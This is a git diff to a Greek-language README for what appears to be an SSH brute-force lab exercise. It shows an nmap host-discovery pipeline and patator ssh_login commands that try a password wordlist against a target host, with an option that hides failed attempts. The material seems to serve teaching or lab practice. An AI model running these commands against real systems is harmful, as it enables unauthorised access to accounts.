diff --git a/2. SSH Brute Force/README.md b/2. SSH Brute Force/README.md index 4be10c0..6b31a65 100644 --- a/2. SSH Brute Force/README.md +++ b/2. SSH Brute Force/README.md @@ -43,12 +43,14 @@ ________________________________________________________________________________ **worker=$(nmap -sP $network | grep worker_1 | awk '{print $NF}' | tr -d '()')** -* Με την ακόλουθη εντολή εκτελείτε η επίθεση. +* Με την ακόλουθη εντολή εκτελείτε η επίθεση, όπου password.txt είναι το αρχείο στο οποίο γίνεται ο έλεγχος για το σωστό κωδικό. **patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker** -#emfanizei kai tis apotyximenes prospatheies -#patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.' -#emfanizei mono tin epithesi ston kwdiko pou isxuei + +Εάν δε θέλουμε να εμφανιστούν, όλες οι ανεπιτυχείς προσπάθειες της επίθεσης, αλλά μόνο ο σωστός κωδικός, πρέπει να συμπληρώσουμε **-x ignore:mesg='Authentication failed.'** και η προηγούμενη εντολή θα εκτελεστεί έτσι: + +**patator ssh_login user=$my_ip password=FILE0 0=passwords.txt host=$worker -x ignore:mesg='Authentication failed.'** +_____________________________________________________________________________________________ **REFERENCES** 1. https://pentestit.medium.com/brute-force-from-ssh-to-web-dc0e986583ae